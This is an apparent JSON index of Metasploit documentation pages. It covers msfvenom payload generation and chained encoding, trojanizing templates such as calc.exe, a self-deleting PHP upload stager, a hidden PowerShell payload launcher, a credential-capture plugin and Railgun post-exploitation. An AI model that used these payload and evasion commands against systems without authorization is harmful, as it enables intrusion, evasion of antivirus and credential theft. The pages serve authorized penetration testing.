    "content": "By default, msfvenom uses templates from the msf/data/templates directory. If you’d like to choose your own, you can use the -x flag like the following: ./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe &amp;gt; new.exe . Please note: If you’d like to create a x64 payload with a custom x64 custom template for Windows, then instead of the exe format, you should use exe-only: ./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only &amp;gt; /tmp/fake_64_calc.exe . The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this currently is only reliable for older Windows machines such as x86 Windows XP. ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-supply-a-custom-template",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-supply-a-custom-template"
  },"390": {
    "doc": "How to use msfvenom",
    "title": "How to chain msfvenom output",
    "content": "The old msfpayload and msfencode utilities were often chained together in order layer on multiple encodings. This is possible using msfvenom as well: ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \\ ./msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | \\ ./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-chain-msfvenom-output",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-chain-msfvenom-output"
  },"391": {
    "doc": "How to use msfvenom",
    "title": "How to use msfvenom",
    "content": "Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015. To start using msfvenom, first please take a look at the options it supports: . Options: -p, --payload &amp;lt;payload&amp;gt; Payload to use. Specify a '-' or stdin to use custom payloads --payload-options List the payload's standard options -l, --list [type] List a module type. Options are: payloads, encoders, nops, all -n, --nopsled &amp;lt;length&amp;gt; Prepend a nopsled of [length] size on to the payload -f, --format &amp;lt;format&amp;gt; Output format (use --help-formats for a list) --help-formats List available formats -e, --encoder &amp;lt;encoder&amp;gt; The encoder to use -a, --arch &amp;lt;arch&amp;gt; The architecture to use --platform &amp;lt;platform&amp;gt; The platform of the payload --help-platforms List available platforms -s, --space &amp;lt;length&amp;gt; The maximum size of the resulting payload --encoder-space &amp;lt;length&amp;gt; The maximum size of the encoded payload (defaults to the -s value) -b, --bad-chars &amp;lt;list&amp;gt; The list of characters to avoid example: '\\x00\\xff' -i, --iterations &amp;lt;count&amp;gt; The number of times to encode the payload -c, --add-code &amp;lt;path&amp;gt; Specify an additional win32 shellcode file to include -x, --template &amp;lt;path&amp;gt; Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread -o, --out &amp;lt;path&amp;gt; Save the payload -v, --var-name &amp;lt;name&amp;gt; Specify a custom variable name to use for certain output formats --smallest Generate the smallest possible payload -h, --help Show this message . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html"
  },"392": {
    "doc": "PhpExe",
    "title": "PhpExe",
    "content": "Arbitrary file upload is surprisingly common among web applications, which can be abused to upload malicious files and then compromise the server. Usually, the attacker will select a payload based on whatever server-side programming language is supported. So if the vulnerable app is in PHP, then clearly PHP is supported, therefore an easy choice would be using a PHP payload such as Metasploit’s PHP meterpreter. However, the PHP meterpreter does not share the same performance as, say, a Windows meterpreter. So in reality, what happens is you will probably want to upgrade to a better shell, which involves extra manual work during the process. So why limit your payload options? For this type of scenario, you should use the PhpEXE mixin. It serves as a payload stager in PHP that will write the final malicious executable onto the remote file system, and then clear itself after use, so it leaves no traces. Requirements . To use the PhpEXE mixin, some typical exploitable requirements should be met: . | You must find a writeable location on the web server. | The same writeable location should also be readable with a HTTP request. | . Note: For an arbitrary file upload bug, there is usually a directory that contains uploaded files, and is readable. If the bug is due to a directory traversal, then a temp folder (either from the OS or the web app) would be your typical choice. Usage . First include the mixin under the scope of your MetasploitModule class like the following: . include Msf::Exploit::PhpEXE . Generate the payload (with the PHP stager) with get_write_exec_payload . p = get_write_exec_payload . If you’re working on a Linux target, then you can set unlink_self to true, which will automatically clear the executable: . p = get_write_exec_payload(:unlink_self=&amp;gt;true) . On Windows, you probably cannot clear the executable because it will probably still be in use. If it’s not possible to automatically clean up malicious files, you should always warn the user about where they are, so they can do it manually later during the penetration test. At this point you can upload the payload generated by get_write_exec_payload, and then call it by using a GET request. If you do not know how to send a GET request, please refer to the following article: How to Send an HTTP Request Using HttpClient . Reference . https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/php_exe.rb . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-phpexe-to-exploit-an-arbitrary-file-upload-bug.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-phpexe-to-exploit-an-arbitrary-file-upload-bug.html"
  },"393": {
    "doc": "Metasploit Plugins",
    "title": "Available Plugins",
    "content": "The current available plugins for Metasploit can be found by running the load -l command, or viewing Metasploit’s plugins directory: . | Name | Description | . | aggregator | Interacts with the external Session Aggregator | . | alias | Adds the ability to alias console commands | . | auto_add_route | Adds routes for any new subnets whenever a session opens | . | beholder | Capture screenshots, webcam pictures, and keystrokes from active sessions | . | besecure | Integrates with the beSECURE - open source vulnerability management | . | capture | Start all credential capture and spoofing services | . | db_credcollect | Automatically grab hashes and tokens from Meterpreter session events and store them in the database | . | db_tracker | Monitors socket calls and updates the database backend | . | event_tester | Internal test tool used to verify the internal framework event subscriber logic works | . | ffautoregen | This plugin reloads and re-executes a file-format exploit module once it has changed | . | fzuse | A plugin offering a fuzzy use command | . | ips_filter | Scans all outgoing data to see if it matches a known IPS signature | . | lab | Adds the ability to manage VMs | . | libnotify | Send desktop notification with libnotify on sessions and db events | . | msfd | Provides a console interface to users over a listening TCP port | . | msgrpc | Provides a MessagePack interface over HTTP | . | nessus | Nessus Bridge for Metasploit | . | nexpose | Integrates with the Rapid7 Nexpose vulnerability management product | . | openvas | Integrates with the OpenVAS - open source vulnerability management | . | pcap_log | Logs all socket operations to pcaps (in /tmp by default) | . | request | Make requests from within Metasploit using various protocols. | . | rssfeed | Create an RSS feed of events | . | sample | Demonstrates using framework plugins | . | session_notifier | This plugin notifies you of a new session via SMS | . | session_tagger | Automatically interacts with new sessions to create a new remote TaggedByUser file | . | socket_logger | Log socket operations to a directory as individual files | . | sounds | Automatically plays a sound when various framework events occur | . | sqlmap | sqlmap plugin for Metasploit | . | thread | Internal test tool for testing thread usage in Metasploit | . | token_adduser | Attempt to add an account using all connected Meterpreter session tokens | . | token_hunter | Search all active Meterpreter sessions for specific tokens | . | wiki | Outputs stored database values from the current workspace into DokuWiki or MediaWiki format | . | wmap | Web assessment plugin | . ",
    "url": "/docs/using-metasploit/intermediate/how-to-use-plugins.html#available-plugins",
    "relUrl": "/docs/using-metasploit/intermediate/how-to-use-plugins.html#available-plugins"
  },"394": {
    "doc": "Metasploit Plugins",
    "title": "Examples",
    "content": "Alias Plugin . The Alias plugin adds the ability to alias console commands: . msf6 &amp;gt; load alias [*] Successfully loaded plugin: alias msf6 &amp;gt; alias -h Usage: alias [options] [name [value]] OPTIONS: -c Clear an alias (* to clear all). -f Force an alias assignment. -h Help banner. Register an alias such as proxy_enable: . msf6 &amp;gt; alias proxy_enable \"set Proxies http:localhost:8079\" . Now when running the aliased proxy_enable command, the proxy datastore value will be set for the current module: . msf6 auxiliary(scanner/http/title) &amp;gt; proxy_enable Proxies =&amp;gt; http:localhost:8079 . Viewing registered aliases: . msf6 &amp;gt; alias Current Aliases =============== Alias Name Alias Value ---------- ----------- alias proxy_enable set Proxies http:localhost:8079 . To automatically load and configure the alias plugin on startup of Metasploit, create a custom ~/.msf4/msfconsole.rc file: . load alias alias proxy_enable \"set Proxies http:localhost:8079\" alias proxy_disable \"unset Proxies\" alias routes \"route print\" . Capture Plugin . Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the modules/auxiliary/server/capture directory. Users can start and configure each of these modules individually, but now the capture plugin can streamline the process. The capture plugin can easily start 13 different services (17 including SSL enabled versions) on the same listening IP address including remote interfaces via Meterpreter. A configuration file can be used to select individual services to start and once finished, all services can easily be stopped using a single command. To use the plugin, it must first be loaded. That will provide the captureg command (for Capture-Global) which then offers start and stop subcommands. In the following example, the plugin is loaded, and then all default services are started on the 192.168.159.128 interface. msf6 &amp;gt; load capture [*] Successfully loaded plugin: Credential Capture msf6 &amp;gt; captureg start --ip 192.168.159.128 Logging results to /home/smcintyre/.msf4/logs/captures/capture_local_20220325104416_589275.txt Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_20220325104416_612808 [+] Authentication Capture: DRDA (DB2, Informix, Derby) started [+] Authentication Capture: FTP started [+] HTTP Client MS Credential Catcher started [+] HTTP Client MS Credential Catcher started [+] Authentication Capture: IMAP started [+] Authentication Capture: MSSQL started [+] Authentication Capture: MySQL started [+] Authentication Capture: POP3 started [+] Authentication Capture: PostgreSQL started [+] Printjob Capture Service started [+] Authentication Capture: SIP started [+] Authentication Capture: SMB started [+] Authentication Capture: SMTP started [+] Authentication Capture: Telnet started [+] Authentication Capture: VNC started [+] Authentication Capture: FTP started [+] Authentication Capture: IMAP started [+] Authentication Capture: POP3 started [+] Authentication Capture: SMTP started [+] NetBIOS Name Service Spoofer started [+] LLMNR Spoofer started [+] mDNS Spoofer started [+] Started capture jobs msf6 &amp;gt; . This content was originally posted on the Rapid7 Blog. ",
    "url": "/docs/using-metasploit/intermediate/how-to-use-plugins.html#examples",
    "relUrl": "/docs/using-metasploit/intermediate/how-to-use-plugins.html#examples"
  },"395": {
    "doc": "Metasploit Plugins",
    "title": "Metasploit Plugins",
    "content": "Metasploit plugins can change the behavior of Metasploit framework by adding new features, new user interface commands, and more. They are designed to have a very loose definition in order to make them as useful as possible. Plugins are not available by default, they need to be loaded: . msf6 &amp;gt; load plugin_name . Plugins can be automatically loaded and configured on msfconsole’s start up by configuring a custom ~/.msf4/msfconsole.rc file: . load plugin_name plugin_name_command --option . ",
    "url": "/docs/using-metasploit/intermediate/how-to-use-plugins.html",
    "relUrl": "/docs/using-metasploit/intermediate/how-to-use-plugins.html"
  },"396": {
    "doc": "Powershell",
    "title": "Powershell",
    "content": "PowerShell is a scripting language developed by Microsoft. It provides API access to almost everything in a Windows platform, less detectable by countermeasures, easy to learn, therefore it is incredibly powerful for penetration testing during post exploitation, or exploit development for payload execution. Take Metasploit’s windows/smb/psexec_psh.rb module for example: it mimics the psexec utility from SysInternals, the payload is compressed and executed from the command line, which allows it to be somewhat stealthy against antivirus. There’s only less than 30 lines of code in psexec_psh.rb (excluding the metadata that describes what the module is about), because most of the work is done by the Powershell mixin, nothing is easier than that. The command line will automatically attempt to detect the architecture (x86 or x86_64) that it is being run in, as well as the payload architecture that it contains. If there is a mismatch it will spawn the correct PowerShell architecture to inject the payload into, so there is no need to worry about the architecture of the target system. Requirements . To use the PowerShell mixin, make sure you meet these requirements: . | The target machine supports PowerShell. Vista or newer should support it. | You must have permission to execute powershell.exe | You must be able to supply system command arguments. | You must set up a command execution type attack in order to execute powershell.exe | . Usage . | To add PowerShell to your module, first you need to require it: | . require 'msf/core/exploit/powershell' . | And then include the mixin within the scope of the Metasploit3 class (or maybe Metasploit4 for some) | . include Msf::Exploit::Powershell . | Use the cmd_psh_payload method to generate the PowerShell payload. | . cmd_psh_payload(payload.encoded, payload_instance.arch.first) . The actual output of cmd_psh_payload is a system command, which would look like the following format (as a one-liner): . %COMSPEC% /B /C start powershell.exe -Command $si = New-Object System.Diagnostics.ProcessStartInfo;$si.FileName = 'powershell.exe'; $si.Arguments = ' -EncodedCommand [BASE64 PAYLOAD] '; $si.UseShellExecute = $false; $si.RedirectStandardOutput = $true;$si.WindowStyle = 'Hidden'; $si.CreateNoWindow = $True; $p = [System.Diagnostics.Process]::Start($si); . A number of options can be used to adjust the final command depending on the circumstances of the exploit. By default the script is compressed but no encoding takes places of the wrapper. This produces a small command of around ~2000 characters (depending on the payload). Of these encode_final_payload is the most noteworthy as it will Base64 encode the full payload giving a very simple command with very few bad characters. However, the command length will increase as a result. Combining this with remove_comspec means the payload would very simply be: . powershell.exe -nop -ep bypass -e AAAABBBBCCCCDDDD.....== . Check out the other advanced options in the API documentation below. References . | https://docs.metasploit.com/api/Msf/Exploit/Powershell.html | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/powershell.rb | https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/powershell/powerdump.ps1 | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html"
  },"397": {
    "doc": "Railgun",
    "title": "Defining a DLL and its functions",
    "content": "The Windows API is obviously quite large, so by default Railgun only comes with a handful of pre-defined DLLs and functions that are commonly used for building a Windows program. These built-in DLLs are: advapi32, crypt32, dbghelp, iphlpapi, kernel32, netapi32, ntdll, psapi, shell32, spoolss, user32, version, winspool, wlanapi, wldap32, and ws2_32. The same list of built-in DLLs can also be retrieved by using the known_library_names method. All DLL definitions are found in the “def” directory, where they are defined as classes. The following template should demonstrate how a DLL is actually defined: . # -*- coding: binary -*- module Rex module Post module Meterpreter module Extensions module Stdapi module Railgun module Def class Def_windows_somedll def self.create_library(constant_manager, dll_path = 'somedll') dll = Library.new(library_path, constant_manager) # 1st argument = Name of the function # 2nd argument = Return value's data type # 3rd argument = An array of parameters dll.add_function('SomeFunction', 'DWORD',[ ['DWORD','hwnd','in'] ]) return dll end end end; end; end; end; end; end; end . In function definitions, Railgun supports these data types: BOOL, BYTE, DWORD, LPVOID, PBLOB, PCHAR, PDWORD, PULONG_PTR, PWCHAR, ULONG_PTR, VOID, WORD. There are four parameter/buffer directions: in, out, inout, and return. When you pass a value to an “in” parameter, Railgun handles the memory management. For example, MessageBoxA has an “in” parameter named lpText, and is of type PCHAR. You can simply pass a Ruby string to it, and Railgun handles the rest, it’s all pretty straight forward. An “out” parameter will always be of a pointer datatype. Basically you tell Railgun how many bytes to allocate for the parameter, it allocates memory, provides a pointer to it when calling the function, and then it reads that region of memory that the function wrote, converts that to a Ruby object and adds it to the return hash. Some datatypes such as LPVOID and ULONG_PTR have a size that is determined based on the host architecture, e.g. 32-bit versions of Windows use 4-byte/32-bit values. For cross compatibility, the number 4 (for 4-bytes) can be used as the size for these values on both 32-bit and 64-bit systems. The number four comes from the size used for these types in the original 32-bit implementation and was selected to maintain backwards compatibility when 64-bit support was added. An “inout” parameter serves as an input to the called function, but can be potentially modified by it. You can inspect the return hash for the modified value like an “out” parameter. The fourth type, “return” is used as the return data type. It is passed to #add_function after the function name argument. A quick way to define a new function (or redefine an existing function) at runtime can be done like the following example: . client.railgun.add_function('user32', 'MessageBoxA', 'DWORD',[ ['DWORD','hWnd','in'], ['PCHAR','lpText','in'], ['PCHAR','lpCaption','in'], ['DWORD','uType','in'] ]) . However, if this function will most likely be used more than once, or it’s part of the Windows API, then you should put it in to the library. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#defining-a-dll-and-its-functions",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#defining-a-dll-and-its-functions"
  },"398": {
    "doc": "Railgun",
    "title": "Usage",
    "content": "The best way to try Railgun is with irb in a Windows Meterpreter prompt. Here’s an example of how to get there: . $ msfconsole -q msf &amp;gt; use exploit/multi/handler msf exploit(handler) &amp;gt; run [*] Started reverse handler on 192.168.1.64:4444 [*] Starting the payload handler... [*] Sending stage (769536 bytes) to 192.168.1.106 [*] Meterpreter session 1 opened (192.168.1.64:4444 -&amp;gt; 192.168.1.106:55148) at 2014-07-30 19:49:35 -0500 meterpreter &amp;gt; irb [*] Starting IRB shell... [*] You are in the \"client\" (session) object &amp;gt;&amp;gt; . Note that when you’re running a post module or in irb, you always have a client or session object to work with, both point to same thing, which in this case is Msf::Sessions::Meterpreter_x86_Win. This Meterpreter session object gives you API access to the target machine, including the Railgun object Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::Railgun. Here’s how you simply access it: . railgun . If you run the above in irb, you will see that it returns information about all the DLLs, functions, constants, etc, except it’s a little unfriendly to read because there’s so much data. Fortunately, there are some handy tricks to help us to figure things out. For example, like we mentioned before, if you’re not sure what DLLs are loaded, you can call the known_dll_name method: . &amp;gt;&amp;gt; railgun.known_library_names =&amp;gt; [\"kernel32\", \"ntdll\", \"user32\", \"ws2_32\", \"iphlpapi\", \"advapi32\", \"shell32\", \"netapi32\", \"crypt32\", \"wlanapi\", \"wldap32\", \"version\", \"psapi\", \"dbghelp\", \"winspool\", \"spoolss\"] . Now, say we’re interested in user32 and we want to find all the available functions (as well as return value’s data type, parameters), another handy trick is this: . railgun.user32.functions.each_pair {|n, v| puts \"Function name: #{n}, Returns: #{v.return_type}, Params: #{v.params}\"} . Note that if you happen to call an invalid or unsupported Windows function, a RuntimeError will raise, and the error message also shows a list of available functions. To call a Windows API function, call the Ruby function of the desired name on the corresponding library (DLL) object. For example to call user32!MessageBoxA: . &amp;gt;&amp;gt; railgun.user32.MessageBoxA(0, \"hello, world\", \"hello\", \"MB_OK\") =&amp;gt; {\"GetLastError\"=&amp;gt;0, \"ErrorMessage\"=&amp;gt;\"The operation completed successfully.\", \"return\"=&amp;gt;1} . As you can see, this API call returns a hash. The “return” key is the return value of the function, as defined by its defined datatype. If the return type is a pointer to a known type (a pointer other than LPVOID, such as PCHAR), then the “return” key will be the value of that type and an additional “&amp;amp;return” key will be included. The “&amp;amp;return” key, when present, is the address in memory at which the “return” value is located. This is useful when the caller needs to both access the value but also have the ability to free it at a later time. Note that in these cases, if the pointer is NULL, “return” will always be Ruby’s nil value and “&amp;amp;return” will be 0. The “GetLastError” key is the threads last-error code, as returned by kernel32!GetLastError. This value is useful for determining if the function call was successful and not not, why it failed. The “ErrorMessage” key is a string to a human readable name of the corresponding “GetLastError” code. When making a function call through railgun, it s important to inspect the results to determine if it was successful before processing any results. There is no error handling for native API calls, so simple mistakes like accessing invalid memory locations will cause the session to close as the host process crashes. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#usage",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#usage"
  },"399": {
    "doc": "Railgun",
    "title": "Memory Reading and Writing",
    "content": "The Railgun class also has useful methods that you will probably use: memread and memwrite. The names are pretty self-explanatory: You read a block of memory, or you write to a region of memory. We’ll demonstrate this with a new block of memory in the payload itself: . &amp;gt;&amp;gt; process = sys.process.open(sys.process.getpid, PROCESS_ALL_ACCESS) =&amp;gt; #&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 @client=#&amp;lt;Session:meterpreter 192.168.1.106:55151 (192.168.1.106) \"WIN-6NH0Q8CJQVM\\sinn3r @ WIN-6NH0Q8CJQVM\"&amp;gt;, @handle=448, @channel=nil, @pid=2268, @aliases={\"image\"=&amp;gt;#&amp;lt;Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x007fe2c5a25828 @process=#&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 ...&amp;gt;&amp;gt;, \"io\"=&amp;gt;#&amp;lt;Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x007fe2c5a257b0 @process=#&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 ...&amp;gt;&amp;gt;, \"memory\"=&amp;gt;#&amp;lt;Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x007fe2c5a25738 @process=#&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 ...&amp;gt;&amp;gt;, \"thread\"=&amp;gt;#&amp;lt;Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x007fe2c5a256c0 @process=#&amp;lt;#&amp;lt;Class:0x007fe2e051b740&amp;gt;:0x007fe2c5a258a0 ...&amp;gt;&amp;gt;}&amp;gt; &amp;gt;&amp;gt; address = process.memory.allocate(1024) =&amp;gt; 5898240 . As you can see, the new allocation is at the previously allocated address. Let’s first write some data to it: . &amp;gt;&amp;gt; railgun.memwrite(address, \"AAAA\\x00\".b) =&amp;gt; true . memwrite returns true, which means successful. Now let’s read 4 bytes from the same address: . &amp;gt;&amp;gt; railgun.memread(address, 4) =&amp;gt; \"AAAA\" . Be aware that if you supply a bad pointer, you can cause an access violation and crash Meterpreter. Reading and Writing Strings . Railgun also has a number of useful utility methods in railgun.util. For example, the #read_string method can be used to read an ASCII string from memory. A read_wstring variant can be used to read UTF-16 strings. &amp;gt;&amp;gt; railgun.util.read_string(address) =&amp;gt; \"AAAA\" . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#memory-reading-and-writing",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#memory-reading-and-writing"
  },"400": {
    "doc": "Railgun",
    "title": "References:",
    "content": ". | https://www.youtube.com/watch?v=AniR-T0AnnI | https://www.defcon.org/images/defcon-20/dc-20-presentations/Maloney/DEFCON-20-Maloney-Railgun.pdf | https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/stdapi/railgun | http://msdn.microsoft.com/en-us/library/ms681381(VS.85).aspx | http://msdn.microsoft.com/en-us/library/aa383749 | http://undocumented.ntinternals.net/ | http://source.winehq.org/WineAPI/ | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#references",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html#references"
  },"401": {
    "doc": "Railgun",
    "title": "Railgun",
    "content": "Railgun is a very powerful post exploitation feature exclusive to the Windows and Python Meterpreters. It allows you to have complete control of your target machine’s Windows API, or you can use whatever DLL you find and do even more creative stuff with it. For example: say you have a Meterpreter session on a Windows target. You have your eyes on a particular application that you believe stores the user’s password, but it is encrypted and there are no tools out there for decryption. With Railgun, you can either tap into the process and grep for any sensitive information found in memory, or you can look for the program’s DLL that’s responsible for the decryption, call it, and let it decrypt it for you. If you’re a penetration tester, obviously post exploitation is an important skill to have, but if you don’t know Railgun, you are missing out a lot. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html"
  },"402": {
    "doc": "How to use the Favorite command",
    "title": "Using the Favorite Command",
    "content": "favorite is an msfconsole command that allows users to easily keep track of their most-used modules. The favorites list is stored in the .msf4/fav_modules file. Adding modules to the favorites list . There are two methods of adding a module to the favorites list. The first way is via simply calling favorite when there is an active module: . msf6 exploit(multi/handler) &amp;gt; favorite [+] Added exploit/multi/handler to the favorite modules file . Using the active module without an active module will print the favorite command help output: . msf6 &amp;gt; favorite [-] No module has been provided to favorite. Usage: favorite [mod1 mod2 ...] Add one or multiple modules to the list of favorite modules stored in /home/msf/.msf4/fav_modules If no module name is specified, the command will add the active module if there is one OPTIONS: -c Clear the contents of the favorite modules file -d Delete module(s) or the current active module from the favorite modules file -h Help banner -l Print the list of favorite modules (alias for `show favorites`) . The second method of adding favorites allows adding multiple modules at once: . msf6 &amp;gt; favorite exploit/multi/handler exploit/windows/smb/psexec [+] Added exploit/multi/handler to the favorite modules file [+] Added exploit/windows/smb/psexec to the favorite modules file msf6 &amp;gt; show favorites Favorites ========= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/handler manual No Generic Payload Handler 1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution . Deleting modules from the favorites list . Modules can be deleted from the favorites list individually or by clearing the contents of the list. For the former, simply use the -d flag and either supply the module name or use the currently active module if that module is in the favorites list. For the latter, supply the -c flag. Deleting an active module from favorites list . msf6 exploit(multi/handler) &amp;gt; favorite -d [*] Removing exploit/multi/handler from the favorite modules file . Specifying module(s) to delete . msf6 &amp;gt; favorite -d exploit/multi/handler exploit/windows/smb/psexec [*] Removing exploit/multi/handler from the favorite modules file [*] Removing exploit/windows/smb/psexec from the favorite modules file . Clearing the favorites list . msf6 &amp;gt; show favorites Favorites ========= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/handler manual No Generic Payload Handler 1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution msf6 &amp;gt; favorite -c [+] Favorite modules file cleared msf6 &amp;gt; show favorites [!] The favorite modules file is empty . Printing the list of favorite modules . The list of favorite modules can be printed by supplying the -l flag. This is an alias for the show favorites and favorites commands. msf6 &amp;gt; favorite -l Favorites ========= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/handler manual No Generic Payload Handler 1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution . ",
    "url": "/docs/using-metasploit/other/how-to-use-the-favorite-command.html#using-the-favorite-command",
    "relUrl": "/docs/using-metasploit/other/how-to-use-the-favorite-command.html#using-the-favorite-command"
  },"403": {
    "doc": "How to use the Favorite command",
    "title": "How to use the Favorite command",
    "content": " ",
    "url": "/docs/using-metasploit/other/how-to-use-the-favorite-command.html",
    "relUrl": "/docs/using-metasploit/other/how-to-use-the-favorite-command.html"
  },"404": {
    "doc": "Fileformat",
    "title": "Fileformat",
    "content": "Msf::Exploit::FILEFORMAT is the mixin to use to create a file format exploit. There actually isn’t much in the mixin, but the most important method is this: file_create: . Usage for file_create . As the name implies, the file_create method allows you to create a file. You should be using this method because it does more than just writing data to disk. One of the important things it does is it will report the file creation to the database in the format of #{ltype}.localpath, and the file will always be written to Metasploit’s local directory defined in Msf::Config.local_directory (by default this path is ~/.msf4/local), which keep files nice and organized. To use the mixin, first include Msf::Exploit::FILEFORMAT under the scope of your Metasploit3 class: . include Msf::Exploit::FILEFORMAT . And here’s an example of using file_create to build an imaginary exploit: . # This is my imaginary exploit buf = \"\" buf &amp;lt;&amp;lt; \"A\" * 1024 buf &amp;lt;&amp;lt; [0x40201f01].pack(\"V\") buf &amp;lt;&amp;lt; \"\\x90\" * 10 buf &amp;lt;&amp;lt; payload.encoded file_create(buf) . Custom filename . The Msf::Exploit::FILENAME mixin by default has a registered FILENAME datastore option, and it is actually optional. If there’s no filename provided, the mixin will set the name in this format: \"exploit.fileformat.#{self.shortname}\", where self.shortname means the shorter version of the module name. If you wish to set a default one (but still changeable by the user), then you simply register it again in the module, like this: . register_options( [ OptString.new('FILENAME', [true, 'The malicious file name', 'msf.jpg']) ], self.class) . Fixed filename . Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the FILENAME datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass msftidy. Instead, here’s how it’s done properly: . 1 - Deregister the FILENAME option . deregister_options('FILENAME') . 2 - Next, override the file_format_filename method, and make it return the filename you want: . def file_format_filename 'something.jpg' end . 3 - Finally, please leave a note about this in the module description. References . | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/fileformat.rb | https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-fileformat-mixin-to-create-a-file-format-exploit.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-fileformat-mixin-to-create-a-file-format-exploit.html"
  },"405": {
    "doc": "Git Mixin",
    "title": "Git Mixin",
    "content": "This page walks through the process of creating an exploit module for vulnerable Git clients. Building a Repository . Many of the existing Git exploits in Metasploit rely on being able to host a valid repository that a Git client can successfully clone. So to get started with building an exploit, the contents of the repo need to be decided on first. Let’s say that the repository is something like the following: . space@vm:~/test-repo$ ls -al total 20 drwxrwxr-x 4 space space 4096 Sep 16 14:06 . drwxr-x--- 23 space space 4096 Sep 16 14:05 .. drwxrwxr-x 2 space space 4096 Sep 16 14:06 dir -rw-rw-r-- 1 space space 10 Sep 16 14:06 file.txt drwxrwxr-x 7 space space 4096 Sep 16 14:06 .git space@vm:~/test-repo$ ls -al dir total 12 drwxrwxr-x 2 space space 4096 Sep 16 14:06 . drwxrwxr-x 4 space space 4096 Sep 16 14:06 .. -rw-rw-r-- 1 space space 5 Sep 16 14:06 test_file.txt . The .git directory is the only component of the repository that won’t be sent, so the repository will consist of the file.txt, the dir folder, and the test_file.txt file that lives within the dir folder. Every file and directory inside the repo is represented as a Git object: File contents are represented as blob objects which get coupled together to form a tree object. Lastly, a commit object is created to hold information about the tree object, including the tree’s sha, the author of the commit, a commit message, etc. There will need to be two tree objects to represent the contents of dir and the contents of the root of the repository. Starting with the contents of dir, a blob object needs to be created to represent the contents of test_file.txt: . space@vm:~/test-repo$ cat dir/test_file.txt test . The Git mixin contains the functionality for building a Git object. To build a blob object, the build_blob_object() class method should be used: . &amp;gt;&amp;gt; contents = \"test\\n\" =&amp;gt; \"test\\n\" &amp;gt;&amp;gt; blob = Msf::Exploit::Git::GitObject.build_blob_object(contents) =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe163c75cd0 . The resulting object will contain the object type, its original contents, its compressed contents, its sha, and its path (where the commit object will be stored client side). Since this will be the only file in the dir folder, the tree object can be created with Msf::Exploit::Git::GitObject.build_tree_object(). A tree object is represented differently, holding information about each file contained in the directory, such as file permissions, file name, object type, and the file’s sha1 hash. Because of that, the build_tree_object() expects a hash or an array of hashes, where each hash looks like the following: . 